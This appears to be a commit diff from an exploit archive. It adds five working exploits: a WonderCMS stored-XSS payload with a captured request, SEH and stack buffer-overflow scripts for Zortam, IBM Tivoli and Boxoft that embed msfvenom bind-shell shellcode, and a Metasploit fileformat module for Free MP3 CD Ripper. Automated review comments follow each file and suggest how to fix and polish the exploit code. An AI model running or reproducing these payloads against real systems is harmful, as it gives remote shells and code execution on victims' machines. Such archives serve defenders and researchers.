DB: 2020-11-21
5 changes to exploits/shellcodes

Zortam Mp3 Media Studio 27.60 - Remote Code Execution (SEH)
IBM Tivoli Storage Manager Command Line Administrative Interface 5.2.0.1 - id' Field Stack Based Buffer Overflow
Free MP3 CD Ripper 2.8 - Multiple File Buffer Overflow (Metasploit)
Boxoft Convert Master 1.3.0 - 'wav' SEH Local Exploit
WonderCMS 3.1.3 - 'content' Persistent Cross-Site Scripting
parent 21fa83f241
commit c14496840d
6 changed files with 391 additions and 0 deletions
exploits/php/webapps/49085.txt (Normal file, 38 lines)
@ -0,0 +1,38 @@
# Exploit Title: WonderCMS 3.1.3 - 'content' Persistent Cross-Site Scripting
|
||||
# Date: 20-11-2020
|
||||
# Exploit Author: Hemant Patidar (HemantSolo)
|
||||
# Vendor Homepage: https://www.wondercms.com/
|
||||
# Version: 3.1.3
|
||||
# Tested on: Windows 10/Kali Linux
|
||||
|
||||
Stored Cross-site scripting(XSS):
|
||||
Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application. Reflected XSS involves the reflecting of a malicious script off of a web application, onto a user's browser.
|
||||
|
||||
Attack vector:
|
||||
This vulnerability can results attacker to inject the XSS payload in Page description and each time any user will visits the website, the XSS triggers and attacker can able to steal the cookie according to the crafted payload.
|
||||
|
||||
Vulnerable Parameters: Page description.
|
||||
|
||||
Steps-To-Reproduce:
|
||||
1. Go to the Simple website builder.
|
||||
2. Put this payload in Page description: "hemantsolo"><img src=x onerror=confirm(1)>"
|
||||
3. Now go to the website and the XSS will be triggered.
|
||||
|
||||
POST /demo/ HTTP/1.1
|
||||
Host: 127.0.0.1
|
||||
Connection: close
|
||||
Content-Length: 196
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
|
||||
DNT: 1
|
||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||
Accept: */*
|
||||
Origin: 127.0.0.1
|
||||
Sec-Fetch-Site: same-origin
|
||||
Sec-Fetch-Mode: cors
|
||||
Sec-Fetch-Dest: empty
|
||||
Referer: 127.0.0.1/demo/
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,hi;q=0.7,ru;q=0.6
|
||||
Cookie: PHPSESSID=da4eae35135fd9ce3c413b936e2e5925
|
||||
|
||||
fieldname=description&token=c526c8235770f7efe7b7868a806f51f9a48545e117e00534e5cd82fde1bf1064&content=HemantSoloHacker%22%3E%3Cimg%20src%3Dx%20onerror%3Dconfirm(1)%3E&target=pages&menu=&visibility=
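Review bot: The captured request on the `Cookie:` and `token=` lines carries a live PHPSESSID value and a CSRF token; replace both with placeholders before publication, since a PoC should not ship real session material. Two consistency points in the same hunk: step 2 quotes the payload as `"hemantsolo"><img src=x onerror=confirm(1)>"` (extra trailing quote, different prefix) while the POST body sends `HemantSoloHacker%22%3E%3Cimg...`, and the header names `content` as the vulnerable parameter while the body says "Page description"; name it once as the `content` field of the page description (`fieldname=description`). The request also shows the payload being submitted from an authenticated session, so the Attack vector paragraph should state that precondition.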
exploits/windows/local/49084.pl (Executable file, 75 lines)
@ -0,0 +1,75 @@
# Exploit Title: Zortam Mp3 Media Studio 27.60 - Remote Code Execution (SEH)
|
||||
# Date: November 19, 2020
|
||||
# Exploit Author: Vincent Wolterman
|
||||
# Vendor Homepage: https://www.zortam.com/index.html
|
||||
# Software Link: https://www.zortam.com/download.html
|
||||
# Version: 27.60
|
||||
# Tested on: Windows 7 Professional SP 1 Build 7601; Windows 10 Professional Build 19041
|
||||
|
||||
# Steps to reproduce crash:
|
||||
# 1) Run provided Perl code Zortam_MP3_Studio_poc.pl
|
||||
# 2) Open Zortam_Crash.txt output file
|
||||
# 3) Copy contents of text file to clipboard
|
||||
# 4) Open Zortam Mp3 Studio
|
||||
# 5) From the Menu bar -> File -> New Library
|
||||
# 6) Click ‘OK’ when prompted ‘Do you want to create a new Mp3 library?’
|
||||
# 7) Paste the contents of Zortam_Crash.txt into the ‘Select Folder’ field
|
||||
# 8) Click 'OK'
|
||||
# 9) Connect to victim machine on port 80
|
||||
|
||||
#!/usr/bin/perl
|
||||
|
||||
$baddata = "Metal's_Greatest_Hits"; # you can put whatever you need to here to convince victim (will be seen during crash)
|
||||
$baddata .= "\x90" x (268-length($baddata)); # exact overwrite at 272
|
||||
|
||||
$nseh = "\xeb\x0b\x90\x90"; # nseh overwrite JMP short 11 bytes into NOP sled
|
||||
|
||||
# 0x10015962 : pop ecx # pop esi # ret | ascii {PAGE_EXECUTE_READ} [WNASPI32.DLL] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.0.1.50
|
||||
# (C:\Program Files\Zortam Mp3 Media Studio\WNASPI32.DLL)
|
||||
|
||||
$seh = "\x62\x59\x01\x10"; # seh overwrite
|
||||
$nop = "\x90" x 12; # NOP sled
|
||||
|
||||
# msfvenom -p windows/shell_bind_tcp LPORT=80 -b "\x00\x0a\x0d" -f perl -v payload EXITFUNC=seh
|
||||
# Payload size: 355 bytes
|
||||
|
||||
$payload =
|
||||
"\xd9\xcf\xbf\xad\x91\xa4\xe3\xd9\x74\x24\xf4\x5a\x29\xc9" .
|
||||
"\xb1\x53\x83\xc2\x04\x31\x7a\x13\x03\xd7\x82\x46\x16\xdb" .
|
||||
"\x4d\x04\xd9\x23\x8e\x69\x53\xc6\xbf\xa9\x07\x83\x90\x19" .
|
||||
"\x43\xc1\x1c\xd1\x01\xf1\x97\x97\x8d\xf6\x10\x1d\xe8\x39" .
|
||||
"\xa0\x0e\xc8\x58\x22\x4d\x1d\xba\x1b\x9e\x50\xbb\x5c\xc3" .
|
||||
"\x99\xe9\x35\x8f\x0c\x1d\x31\xc5\x8c\x96\x09\xcb\x94\x4b" .
|
||||
"\xd9\xea\xb5\xda\x51\xb5\x15\xdd\xb6\xcd\x1f\xc5\xdb\xe8" .
|
||||
"\xd6\x7e\x2f\x86\xe8\x56\x61\x67\x46\x97\x4d\x9a\x96\xd0" .
|
||||
"\x6a\x45\xed\x28\x89\xf8\xf6\xef\xf3\x26\x72\xeb\x54\xac" .
|
||||
"\x24\xd7\x65\x61\xb2\x9c\x6a\xce\xb0\xfa\x6e\xd1\x15\x71" .
|
||||
"\x8a\x5a\x98\x55\x1a\x18\xbf\x71\x46\xfa\xde\x20\x22\xad" .
|
||||
"\xdf\x32\x8d\x12\x7a\x39\x20\x46\xf7\x60\x2d\xab\x3a\x9a" .
|
||||
"\xad\xa3\x4d\xe9\x9f\x6c\xe6\x65\xac\xe5\x20\x72\xd3\xdf" .
|
||||
"\x95\xec\x2a\xe0\xe5\x25\xe9\xb4\xb5\x5d\xd8\xb4\x5d\x9d" .
|
||||
"\xe5\x60\xcb\x95\x40\xdb\xee\x58\x32\x8b\xae\xf2\xdb\xc1" .
|
||||
"\x20\x2d\xfb\xe9\xea\x46\x94\x17\x15\x68\x35\x91\xf3\x02" .
|
||||
"\xa5\xf7\xac\xba\x07\x2c\x65\x5d\x77\x06\xdd\xc9\x30\x40" .
|
||||
"\xda\xf6\xc0\x46\x4c\x60\x4b\x85\x48\x91\x4c\x80\xf8\xc6" .
|
||||
"\xdb\x5e\x69\xa5\x7a\x5e\xa0\x5d\x1e\xcd\x2f\x9d\x69\xee" .
|
||||
"\xe7\xca\x3e\xc0\xf1\x9e\xd2\x7b\xa8\xbc\x2e\x1d\x93\x04" .
|
||||
"\xf5\xde\x1a\x85\x78\x5a\x39\x95\x44\x63\x05\xc1\x18\x32" .
|
||||
"\xd3\xbf\xde\xec\x95\x69\x89\x43\x7c\xfd\x4c\xa8\xbf\x7b" .
|
||||
"\x51\xe5\x49\x63\xe0\x50\x0c\x9c\xcd\x34\x98\xe5\x33\xa5" .
|
||||
"\x67\x3c\xf0\xdb\x96\x8c\xed\x4c\x01\x65\x4c\x11\xb2\x50" .
|
||||
"\x93\x2c\x31\x50\x6c\xcb\x29\x11\x69\x97\xed\xca\x03\x88" .
|
||||
"\x9b\xec\xb0\xa9\x89";
|
||||
|
||||
|
||||
$file = "Zortam_Crash.txt";
|
||||
open (FILE, '>Zortam_Crash.txt');
|
||||
print FILE $baddata;
|
||||
print FILE $nseh;
|
||||
print FILE $seh;
|
||||
print FILE $nop;
|
||||
print FILE $payload;
|
||||
close (FILE);
|
||||
|
||||
print "Exploit file created [" . $file . "]\n";
|
||||
print "Buffer size: " . length($baddata) . "\n";
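Review bot: The `#!/usr/bin/perl` line sits after the header comments instead of on line 1, so the file is marked executable but the shebang will not be honoured; move it to the top and let the `# Exploit Title` block follow it. `$file = "Zortam_Crash.txt"` is defined but `open (FILE, '>Zortam_Crash.txt')` repeats the literal and has no error check; use `open(my $fh, '>', $file) or die "cannot write $file: $!"` so the 'Exploit file created' message cannot print after a failed open. The title says 'Remote Code Execution' while the steps require the user to paste the crafted text into a local dialog and the index files it under `windows/local`; the title should match that classification so defenders triage it correctly. The comment `exact overwrite at 272` is consistent with 268 bytes of padding plus the 4-byte NSEH, but reads more clearly as 'SEH handler at offset 272'.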
exploits/windows/local/49086.py (Executable file, 141 lines)
@ -0,0 +1,141 @@
# Exploit Title: IBM Tivoli Storage Manager Command Line Administrative Interface 5.2.0.1 - id' Field Stack Based Buffer Overflow
|
||||
# Exploit Author: Paolo Stagno aka VoidSec
|
||||
# Vendor Homepage: https://www.ibm.com/support/knowledgecenter/en/SSGSG7_7.1.0/com.ibm.itsm.tsm.doc/welcome.html
|
||||
# Version: 5.2.0.1
|
||||
# Tested on: Windows 10 Pro v.10.0.19041 Build 19041
|
||||
|
||||
"""
|
||||
Usage: IBM Tivoli Storage Manager > in the "id" field paste the content of "IBM_TSM_v.5.2.0.1_exploit.txt" and press "ENTER"
|
||||
|
||||
PS C:\Users\user\Desktop> Import-Module .\Get-PESecurity.psm1
|
||||
PS C:\Users\user\Desktop> Get-PESecurity -file "dsmadmc.exe"
|
||||
FileName : dsmadmc.exe
|
||||
ARCH : I386
|
||||
DotNET : False
|
||||
ASLR : True
|
||||
DEP : True
|
||||
Authenticode : False
|
||||
StrongNaming : N/A
|
||||
SafeSEH : False
|
||||
ControlFlowGuard : False
|
||||
HighentropyVA : False
|
||||
"""
|
||||
|
||||
# [ buffer ]
|
||||
# [ 68 byte | EIP | rest of the buffer ]
|
||||
# ^_ESP
|
||||
"""
|
||||
EIP contains normal pattern : 0x33634132 (offset 68)
|
||||
ESP (0x0019e314) points at offset 72 in normal pattern (length 3928)
|
||||
|
||||
JMP ESP Pointers:
|
||||
0x028039eb : jmp esp | {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0
|
||||
0x02803d7b : jmp esp | {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0
|
||||
0x02852c21 : jmp esp | {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0
|
||||
0x0289fbe3 : call esp | {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0
|
||||
0x0289fd2f : call esp | {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0
|
||||
0x028823a9 : push esp # ret 0x04 | {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0
|
||||
"""
|
||||
|
||||
#!/usr/bin/python
|
||||
import struct
|
||||
|
||||
# 4000 bytes
|
||||
buff_max_length=800
|
||||
eip_offset=68
|
||||
"""
|
||||
BAD CHARS: \x00\x08\x09\x0a\x0d\x1a\x1b\x7f
|
||||
|
||||
GOOD CHARS:
|
||||
asciiprint \x20-\x7e
|
||||
|
||||
MOD CHARS:
|
||||
\x00 -> \x20
|
||||
,-----------------------------------------------.
|
||||
| Comparison results: |
|
||||
|-----------------------------------------------|
|
||||
| 80 81 82 83 84 85 86 87| File
|
||||
| 3f 3f 2c 9f 2c 2e 2b d8| Memory
|
||||
80 |88 89 8a 8b 8c 8d 8e 8f 90 91 92 93 94 95 96 97| File
|
||||
|5e 25 53 3c 4f 3f 5a 3f 3f 60 27 22 22 07 2d 2d| Memory
|
||||
90 |98 99 9a 9b 9c 9d 9e 9f a0 a1 a2 a3 a4 a5 a6 a7| File
|
||||
|7e 54 73 3e 6f 3f 7a 59 20 ad 9b 9c 0f 9d dd 15| Memory
|
||||
a0 |a8 a9 aa ab ac ad ae af b0 b1 b2 b3 b4 b5 b6 b7| File
|
||||
|22 63 a6 ae aa 2d 72 5f f8 f1 fd 33 27 e6 14 fa| Memory
|
||||
b0 |b8 b9 ba bb bc bd be bf c0 c1 c2 c3 c4 c5 c6 c7| File
|
||||
|2c 31 a7 af ac ab 5f a8 41 41 41 41 8e 8f 92 80| Memory
|
||||
c0 |c8 c9 ca cb cc cd ce cf d0 d1 d2 d3 d4 d5 d6 d7| File
|
||||
|45 90 45 45 49 49 49 49 44 a5 4f 4f 4f 4f 99 78| Memory
|
||||
d0 |d8 d9 da db dc dd de df e0 e1 e2 e3 e4 e5 e6 e7| File
|
||||
|4f 55 55 55 9a 59 5f e1 85 a0 83 61 84 86 91 87| Memory
|
||||
e0 |e8 e9 ea eb ec ed ee ef f0 f1 f2 f3 f4 f5 f6 f7| File
|
||||
|8a 82 88 89 8d a1 8c 8b 64 a4 95 a2 93 6f 94 f6| Memory
|
||||
f0 |f8 f9 fa fb fc fd fe ff | File
|
||||
|6f 97 a3 96 81 79 5f 98 | Memory
|
||||
`-----------------------------------------------'
|
||||
"""
|
||||
# msfvenom -p windows/shell_bind_tcp -f python -v shellcode -a x86 --platform windows -b "\x00\x08\x09\x0a\x0d\x1a\x1b\x7f" -e x86/alpha_mixed BufferRegister=ESP --smallest
|
||||
shellcode = b""
|
||||
shellcode += b"\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49"
|
||||
shellcode += b"\x49\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a"
|
||||
shellcode += b"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51"
|
||||
shellcode += b"\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
|
||||
shellcode += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x78\x59\x78"
|
||||
shellcode += b"\x6b\x4d\x4b\x6b\x69\x62\x54\x61\x34\x6a\x54"
|
||||
shellcode += b"\x76\x51\x6a\x72\x6c\x72\x54\x37\x45\x61\x4f"
|
||||
shellcode += b"\x39\x61\x74\x4e\x6b\x62\x51\x66\x50\x6c\x4b"
|
||||
shellcode += b"\x53\x46\x34\x4c\x6c\x4b\x32\x56\x35\x4c\x6e"
|
||||
shellcode += b"\x6b\x67\x36\x37\x78\x6e\x6b\x43\x4e\x51\x30"
|
||||
shellcode += b"\x4c\x4b\x67\x46\x74\x78\x50\x4f\x72\x38\x42"
|
||||
shellcode += b"\x55\x6c\x33\x30\x59\x56\x61\x38\x51\x39\x6f"
|
||||
shellcode += b"\x49\x71\x73\x50\x4e\x6b\x70\x6c\x31\x34\x54"
|
||||
shellcode += b"\x64\x6e\x6b\x73\x75\x67\x4c\x4e\x6b\x66\x34"
|
||||
shellcode += b"\x46\x48\x74\x38\x45\x51\x69\x7a\x4c\x4b\x31"
|
||||
shellcode += b"\x5a\x67\x68\x6e\x6b\x42\x7a\x51\x30\x46\x61"
|
||||
shellcode += b"\x6a\x4b\x68\x63\x36\x54\x47\x39\x6c\x4b\x35"
|
||||
shellcode += b"\x64\x6c\x4b\x67\x71\x5a\x4e\x74\x71\x6b\x4f"
|
||||
shellcode += b"\x64\x71\x6f\x30\x59\x6c\x6c\x6c\x6f\x74\x39"
|
||||
shellcode += b"\x50\x50\x74\x43\x37\x49\x51\x58\x4f\x34\x4d"
|
||||
shellcode += b"\x77\x71\x6f\x37\x5a\x4b\x6c\x34\x35\x6b\x53"
|
||||
shellcode += b"\x4c\x35\x74\x35\x78\x73\x45\x48\x61\x6c\x4b"
|
||||
shellcode += b"\x42\x7a\x75\x74\x66\x61\x5a\x4b\x50\x66\x4c"
|
||||
shellcode += b"\x4b\x46\x6c\x70\x4b\x4e\x6b\x31\x4a\x77\x6c"
|
||||
shellcode += b"\x76\x61\x68\x6b\x4e\x6b\x53\x34\x6c\x4b\x53"
|
||||
shellcode += b"\x31\x4a\x48\x4e\x69\x37\x34\x56\x44\x65\x4c"
|
||||
shellcode += b"\x70\x61\x38\x43\x4f\x42\x45\x58\x61\x39\x38"
|
||||
shellcode += b"\x54\x6f\x79\x48\x65\x4f\x79\x59\x52\x43\x58"
|
||||
shellcode += b"\x4c\x4e\x32\x6e\x36\x6e\x7a\x4c\x72\x72\x49"
|
||||
shellcode += b"\x78\x4f\x6f\x4b\x4f\x6b\x4f\x6b\x4f\x4e\x69"
|
||||
shellcode += b"\x42\x65\x54\x44\x6f\x4b\x73\x4e\x68\x58\x4b"
|
||||
shellcode += b"\x52\x44\x33\x6c\x47\x75\x4c\x37\x54\x42\x72"
|
||||
shellcode += b"\x4d\x38\x6e\x6e\x69\x6f\x59\x6f\x49\x6f\x6d"
|
||||
shellcode += b"\x59\x57\x35\x73\x38\x70\x68\x32\x4c\x52\x4c"
|
||||
shellcode += b"\x67\x50\x71\x51\x75\x38\x65\x63\x76\x52\x76"
|
||||
shellcode += b"\x4e\x42\x44\x61\x78\x34\x35\x54\x33\x71\x75"
|
||||
shellcode += b"\x73\x42\x70\x30\x79\x4b\x6b\x38\x61\x4c\x31"
|
||||
shellcode += b"\x34\x57\x7a\x4c\x49\x59\x76\x31\x46\x69\x6f"
|
||||
shellcode += b"\x33\x65\x67\x74\x4f\x79\x6a\x62\x32\x70\x6d"
|
||||
shellcode += b"\x6b\x4d\x78\x6f\x52\x42\x6d\x4f\x4c\x6f\x77"
|
||||
shellcode += b"\x55\x4c\x75\x74\x53\x62\x79\x78\x61\x4f\x79"
|
||||
shellcode += b"\x6f\x6b\x4f\x79\x6f\x30\x68\x42\x4f\x62\x58"
|
||||
shellcode += b"\x63\x68\x77\x50\x73\x58\x70\x61\x30\x67\x33"
|
||||
shellcode += b"\x55\x50\x42\x43\x58\x32\x6d\x70\x65\x61\x63"
|
||||
shellcode += b"\x32\x53\x76\x51\x69\x4b\x6d\x58\x33\x6c\x51"
|
||||
shellcode += b"\x34\x35\x5a\x4b\x39\x6b\x53\x72\x48\x70\x58"
|
||||
shellcode += b"\x47\x50\x55\x70\x57\x50\x42\x48\x62\x50\x63"
|
||||
shellcode += b"\x47\x70\x6e\x35\x34\x34\x71\x6f\x39\x4c\x48"
|
||||
shellcode += b"\x30\x4c\x74\x64\x67\x74\x6e\x69\x4b\x51\x54"
|
||||
shellcode += b"\x71\x58\x52\x62\x72\x36\x33\x62\x71\x71\x42"
|
||||
shellcode += b"\x79\x6f\x68\x50\x74\x71\x79\x50\x76\x30\x69"
|
||||
shellcode += b"\x6f\x50\x55\x54\x48\x41\x41"
|
||||
|
||||
buff = ""
|
||||
buff += "A" * eip_offset
|
||||
buff += struct.pack("<I",0x02c73d7b) # 0x02803d7b cause char modification needs to be written as 0x02c73d7b
|
||||
buff += shellcode
|
||||
buff += "C" * (buff_max_length - len(buff))
|
||||
|
||||
print("Writing {} bytes".format(len(buff)))
|
||||
f = open("IBM_TSM_v.5.2.0.1_exploit.txt", "w")
|
||||
f.write(buff)
|
||||
f.close()
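Review bot: `buff` is built as a `str` (`buff = ""`, `"A" * eip_offset`) but `shellcode` is a `bytes` literal, so `buff += shellcode` raises TypeError under Python 3 and only works under Python 2; either declare the interpreter as `#!/usr/bin/python2` or make everything bytes (`buff = b""`, `b"A" * eip_offset`, `b"C" * ...`) and open the output with `"wb"`. The shebang is also placed after the docstrings instead of on line 1, and the `# 4000 bytes` comment contradicts `buff_max_length=800` (the debugger output above reports a 3928-byte pattern). The return-address remap in the `struct.pack` comment is consistent with the comparison table in this hunk (file byte `c7` reads back as `80`); saying so next to the pack call would save the next reader the lookup. The header is missing the `# Date:` field the other files in this commit carry.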
exploits/windows/local/49087.rb (Executable file, 66 lines)
@ -0,0 +1,66 @@
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::FILEFORMAT
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => "Free MP3 CD Ripper 2.6 < 2.8 (.wma.wav.flac.m3u.acc) Buffer Overflow",
|
||||
'Description' => %q{
|
||||
This module exploits a buffer overflow in Free MP3 CD Ripper versions 2.6 and 2.8.
|
||||
By constructing a specially crafted WMA WAV M3U ACC FLAC file and attempting to convert it to an MP3 file in the
|
||||
application, a buffer is overwritten, which allows for running shellcode.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Gionathan Reale', # Exploit-DB POC
|
||||
'ZwX' # Metasploit Module
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2019-9767' ],
|
||||
[ 'EDB', '45412' ],
|
||||
[ 'URL', 'https://www.exploit-db.com/exploits/45412' ]
|
||||
],
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[
|
||||
'Windows 7 x86 - Windows 7 x64',
|
||||
{
|
||||
'Ret' => 0x66e42121 # POP POP RET
|
||||
}
|
||||
]
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
'BadChars' => "\x00\x0a\x0d\x2f"
|
||||
},
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => "Sep 09 2018",
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('FILENAME', [true, 'Create malicious file example extension (.wma .wav .acc .flac .m3u)', 'name.wma'])
|
||||
])
|
||||
end
|
||||
|
||||
def exploit
|
||||
file_payload = payload.encoded
|
||||
|
||||
msfsploit = make_fast_nops(4116)
|
||||
msfsploit << "\xeb\x06#{Rex::Text.rand_text_alpha(2, payload_badchars)}" # NSEH_JMP
|
||||
msfsploit << [target.ret].pack("V*") # SEH
|
||||
msfsploit << file_payload
|
||||
msfsploit << make_fast_nops(4440)
|
||||
|
||||
file_create(msfsploit)
|
||||
end
|
||||
end
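Review bot: `Rank = ExcellentRanking` is too high for this module: it is an SEH overwrite with a single hard-coded `'Ret' => 0x66e42121`, and the framework's ranking guidance reserves Excellent for exploits that cannot crash the target; Normal or Good fits a fixed-address memory-corruption fileformat exploit. The `# POP POP RET` comment should name the DLL the gadget comes from, and the target label 'Windows 7 x86 - Windows 7 x64' is misleading because the address depends on the application module, not the OS. Naming is inconsistent across the hunk: `'Name'` says '2.6 < 2.8', the description says 'versions 2.6 and 2.8' and the index title says 2.8 only; the extension list also writes '.acc' where the audio format is AAC, so confirm which extension the application actually accepts.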
exploits/windows/local/49088.py (Executable file, 66 lines)
@ -0,0 +1,66 @@
# Exploit Title: Boxoft Convert Master 1.3.0 - 'wav' SEH Local Exploit
|
||||
# Date: 17.09.2020
|
||||
# Vendor Homepage: http://www.boxoft.com/
|
||||
# Software Link: http://www.boxoft.com/convert-master/setup(boxoft-conver=t-master).exe
|
||||
# Exploit Author: Achilles
|
||||
# Tested Version: 1.3.0
|
||||
# Tested on: Windows 7 x64
|
||||
|
||||
# 1.- Run python code :Boxoft_Convert_Master.py
|
||||
# 2.- Open Boxoft_Convert_Master.exe
|
||||
# 3.- Click try and Batch Convert Mode
|
||||
# 4.- Add Evil.wav
|
||||
# 5.- And you will have a bind shell port 4444
|
||||
# 6.- Greetings go:XiDreamzzXi,Metatron
|
||||
|
||||
#!/usr/bin/env python
|
||||
|
||||
import struct
|
||||
|
||||
buffer = "\x41" * 4132
|
||||
nseh = "\xeb\x06\x90\x90" #jmp short 6
|
||||
seh = struct.pack('<L',0x6d00c683) #CDRip122.dll
|
||||
nops = "\x90" * 20
|
||||
#Bind=shellcode port 4444
|
||||
shellcode = ("\xda\xd5\xb8\x9b\x69\x4d\xa1\xd9\x74\x24\xf4\x5a\x33"
|
||||
"\xc9\xb1\x60\x83\xc2\x04\x31\x42\x15\x03\x42\x15\x79"
|
||||
"\x9c\xf2\x9b\x0c\xb0\x35\x05\x03\x97\x32\x91\x2f\x75"
|
||||
"\x92\x10\x7e\xdf\xd5\xdf\x95\x63\xd0\x24\x96\x1e\xca"
|
||||
"\xc6\x57\x4b\xd9\xe7\x3c\xe4\x1c\xa0\xd9\x7e\x72\xe4"
|
||||
"\x38\x26\xd1\x92\x88\x79\x63\x55\xe3\x94\xfe\x9a\xac"
|
||||
"\xb5\xde\xe4\x35\xbc\xd0\x9f\xe6\x92\x63\x51\x5a\xaf"
|
||||
"\xad\x1b\xb0\xf9\x6e\x46\xac\x68\xa9\x48\xce\xb8\xe1"
|
||||
"\xd2\xf5\x1a\x7d\x84\xde\xb9\x55\xa0\xe8\xe3\xd8\xb2"
|
||||
"\x31\xfb\x1a\x0b\xea\xed\xf4\x8f\xdd\xf5\x55\xbf\x1a"
|
||||
"\xa5\xe8\xd8\xfa\xde\x45\x11\x7c\x4d\xea\x87\x0f\x9f"
|
||||
"\xe5\xdf\x90\x18\x7e\x52\x1b\xd7\x24\x22\xab\x1b\xda"
|
||||
"\x31\xa2\x75\x8f\xa3\x13\x99\x20\x5e\x07\x57\x68\x3e"
|
||||
"\x10\xc7\xc2\xb0\x2b\xa0\x13\xd6\x6a\x3e\xc3\x1e\x99"
|
||||
"\x4f\xf0\xce\x63\x50\xe3\x90\x80\x3e\x0e\x9c\x39\x7e"
|
||||
"\x48\xe6\xf0\xe7\x3b\xd3\x7d\xe3\xa3\x62\x41\xee\x19"
|
||||
"\xd0\xa8\xc9\xdb\x02\x93\x0f\x34\xb0\xad\x81\x08\x57"
|
||||
"\xce\xb8\x38\xfe\x13\xc9\xe7\x40\xc2\x17\xa6\x3a\x4c"
|
||||
"\x06\x31\xfc\x3f\x8f\xcb\x85\x84\x74\x98\x9c\x63\xe5"
|
||||
"\x46\x2f\xfc\x15\x3b\x5c\x37\xd3\x36\xfc\x39\x3c\x86"
|
||||
"\x29\x32\xbb\xb3\x04\x13\x6a\xd1\xa7\x55\xac\x8e\xa8"
|
||||
"\x05\xaf\xc3\xae\x9d\xc6\x5f\xa8\x9d\x8e\x4a\x25\x3a"
|
||||
"\x35\xa3\xd7\x4c\xaa\xb1\x87\xca\x54\x6d\xdc\xb2\xf3"
|
||||
"\x3a\xaa\x29\xea\x44\x01\x4e\xb0\x08\x9a\xd0\xb5\x69"
|
||||
"\x42\xe5\xb4\x5f\x59\xff\xb4\x90\xe2\x97\x66\x09\x89"
|
||||
"\x87\x8e\xff\xa8\x21\x68\x3f\x01\xe9\xb3\x27\x63\xd2"
|
||||
"\x93\x2f\x4d\x9c\x28\x21\xd4\x9d\xad\x8f\x24\x19\xc9"
|
||||
"\x98\xbc\x24\x0b\x47\x84\x9c\x57\xd2\x20\x79\x71\x67"
|
||||
"\xe0\xd1\xcd\x40\x51\x7d\xe2\x39\xa9\xd2\x92\x4c\x24"
|
||||
"\x59\x7b\xfd\x89\x6e\xea\xec\xc8\xac\x54\x8a\x26\x60"
|
||||
"\x81\x38\x06\x32\xab\x56\x1c\xe7\xd0\x78\xe5\xa2\x75"
|
||||
"\xc8\x28\x1b\xd5\x3f\x51")
|
||||
payload = buffer + nseh + seh + nops + shellcode
|
||||
|
||||
try:
|
||||
f=open("Evil.wav","w")
|
||||
print "[+] Creating %s bytes evil payload.." %len(payload)
|
||||
f.write(payload)
|
||||
f.close()
|
||||
print "[+] File created!"
|
||||
except:
|
||||
print "File cannot be created"
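Review bot: `f=open("Evil.wav","w")` opens the output in text mode; on the stated Windows 7 target Python translates any `\n` (0x0a) byte in the payload to `\r\n`, which silently corrupts the file, so use `"wb"`. The bare `except:` prints 'File cannot be created' for every exception and hides the real cause; print the exception or drop the try/except. The shebang `#!/usr/bin/env python` is placed after the header comments instead of on line 1, and the `print "..."` statements make this Python 2 only, so it should read `python2`. Step 6 ('Greetings go: ...') is not a reproduction step and belongs outside the numbered list.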
@ -11200,6 +11200,10 @@ id,file,description,date,author,type,platform,port
48776,exploits/windows/local/48776.py,"BlazeDVD 7.0 Professional - '.plf' Local Buffer Overflow (SEH_ASLR_DEP)",2020-08-31,emalp,local,windows,
|
||||
48789,exploits/windows/local/48789.txt,"BarracudaDrive v6.5 - Insecure Folder Permissions",2020-09-03,boku,local,windows,
|
||||
49066,exploits/windows/local/49066.txt,"LCD_Service 1.0.1.0 - 'LCD_Service' Unquote Service Path",2020-11-17,"Gerardo González",local,windows,
|
||||
49084,exploits/windows/local/49084.pl,"Zortam Mp3 Media Studio 27.60 - Remote Code Execution (SEH)",2020-11-20,"Vincent Wolterman",local,windows,
|
||||
49086,exploits/windows/local/49086.py,"IBM Tivoli Storage Manager Command Line Administrative Interface 5.2.0.1 - id' Field Stack Based Buffer Overflow",2020-11-20,"Paolo Stagno",local,windows,
|
||||
49087,exploits/windows/local/49087.rb,"Free MP3 CD Ripper 2.8 - Multiple File Buffer Overflow (Metasploit)",2020-11-20,ZwX,local,windows,
|
||||
49088,exploits/windows/local/49088.py,"Boxoft Convert Master 1.3.0 - 'wav' SEH Local Exploit",2020-11-20,stresser,local,windows,
|
||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
||||
